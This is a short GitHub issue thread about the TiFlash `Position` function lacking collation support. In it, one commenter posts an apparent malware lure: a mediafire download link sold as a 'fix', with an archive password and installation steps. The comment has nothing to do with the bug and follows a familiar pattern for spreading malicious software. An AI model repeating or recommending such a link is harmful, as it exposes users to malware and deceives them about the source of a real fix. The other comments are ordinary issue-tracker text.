### ISSUE TITLE
`Position` function does not support collation

### ISSUE THREAD

**Issue by xzhangxian1008** [pingcap/tiflash#9377]
## Bug Report

Please answer these questions before submitting your issue. Thanks!

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by xzhangxian1008** [comment]
/remove-may-affect-5.4
